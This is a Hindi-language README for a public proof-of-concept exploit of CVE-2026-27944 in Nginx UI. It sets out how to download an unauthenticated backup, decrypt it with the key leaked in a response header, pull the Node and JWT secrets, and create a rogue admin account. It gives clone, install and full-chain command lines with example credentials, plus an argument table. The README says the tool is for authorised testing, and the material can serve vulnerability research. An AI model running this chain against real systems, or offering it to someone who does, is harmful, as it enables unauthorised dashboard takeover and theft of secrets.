
CVE-2026-27944 के लिए Nginx UI में स्वचालित शोषण: बैकअप डाउनलोड और डिक्रिप्ट करता है, गोपनीय जानकारी निकालता है, और पूर्ण डैशबोर्ड अधिग्रहण के लिए नकली एडमिन खाते बनाता है।
इस रिपॉजिटरी में CVE-2026-27944 के लिए एक उन्नत प्रूफ ऑफ कॉन्सेप्ट (POC) एक्सप्लॉइट शामिल है, जो Nginx UI में एक गंभीर भेद्यता है।
यह भेद्यता एक बिना प्रमाणीकरण वाले हमलावर को /api/backup एंडपॉइंट के माध्यम से सिस्टम बैकअप डाउनलोड करने की अनुमति देती है। इसके अलावा, एप्लिकेशन X-Backup-Security HTTP रिस्पॉन्स हेडर के अंदर AES-256 एन्क्रिप्शन कुंजी और IV लीक कर देता है, जिससे हमलावर डाउनलोड किए गए बैकअप को आसानी से डिक्रिप्ट कर सकता है।
यह उन्नत POC पूरी हमले की श्रृंखला को स्वचालित करता है: बैकअप डाउनलोड करना, उसकी सामग्री को डिक्रिप्ट करना, कॉन्फ़िगरेशन रहस्य (जैसे Node Secret और JWT Secret) निकालना, और उन रहस्यों का उपयोग करके प्रमाणीकरण को बायपास करना और पूर्ण डैशबोर्ड अधिग्रहण के लिए एक दुष्ट व्यवस्थापक खाता बनाना।
यह टूल केवल शैक्षिक उद्देश्यों और अधिकृत पेनेट्रेशन टेस्टिंग के लिए है। इस टूल का उपयोग उन सिस्टमों के खिलाफ न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति नहीं है। इस स्क्रिप्ट के किसी भी दुरुपयोग या क्षति के लिए लेखक जिम्मेदार नहीं है।
X-Backup-Security हेडर को पार्स करता है, और बैकअप को डिक्रिप्ट करता है (AES-256-CBC)।app.ini को स्वचालित रूप से पार्स करता है:
X-Node-Secret हेडर) का उपयोग करता है।pycryptodome लाइब्रेरी (AES डिक्रिप्शन के लिए आवश्यक)रिपॉजिटरी को क्लोन करें:
git clone https://github.com/Skynoxk/CVE-2026-27944-POC.git
cd CVE-2026-27944-POC
आवश्यक निर्भरताएं स्थापित करें:
pip install pycryptodome
python exploit_enhanced.py --target <URL> [OPTIONS]
1. केवल बैकअप डाउनलोड और डिक्रिप्ट करें:
python exploit_enhanced.py --target http://127.0.0.1:9000 --out backup.bin --decrypt
2. डाउनलोड करें, डिक्रिप्ट करें, और कॉन्फ़िगरेशन रहस्य निकालें:
python exploit_enhanced.py --target http://127.0.0.1:9000 --decrypt --show-secrets
3. पूर्ण एक्सप्लॉइट श्रृंखला (डाउनलोड, डिक्रिप्ट, रहस्य निकालें, और व्यवस्थापक बनाएं):
python exploit_enhanced.py --target http://127.0.0.1:9000 --decrypt --create-user hacker --password Pwned@123!
यदि --create-user फ्लैग सफलतापूर्वक उपयोग किया जाता है, तो स्क्रिप्ट Nginx UI डैशबोर्ड तक पहुंचने के विस्तृत तरीके आउटपुट करेगी, जिनमें शामिल हैं:
authorization कुकी सेट करना।X-Node-Secret हेडर का उपयोग करने वाले curl कमांड।| तर्क | विवरण | डिफ़ॉल्ट |
|---|
--target | (आवश्यक) Nginx UI इंस्टेंस का बेस URL (जैसे, http://127.0.0.1:9000) | |
--out | एन्क्रिप्टेड बैकअप को सहेजने के लिए फ़ाइल पथ | backup.bin |
--decrypt | डाउनलोड किए गए बैकअप को डिक्रिप्ट करें | False |
--extract-dir | डिक्रिप्टेड फ़ाइलों को निकालने के लिए निर्देशिका | backup_extracted |
--show-secrets | app.ini से संवेदनशील रहस्य निकालें और प्रदर्शित करें | False |
--create-user | डैशबोर्ड एक्सेस के लिए एक व्यवस्थापक उपयोगकर्ता बनाएं (उपयोगकर्ता नाम निर्दिष्ट करें) | |
--password | नव निर्मित व्यवस्थापक उपयोगकर्ता के लिए पासवर्ड | Admin@123456 |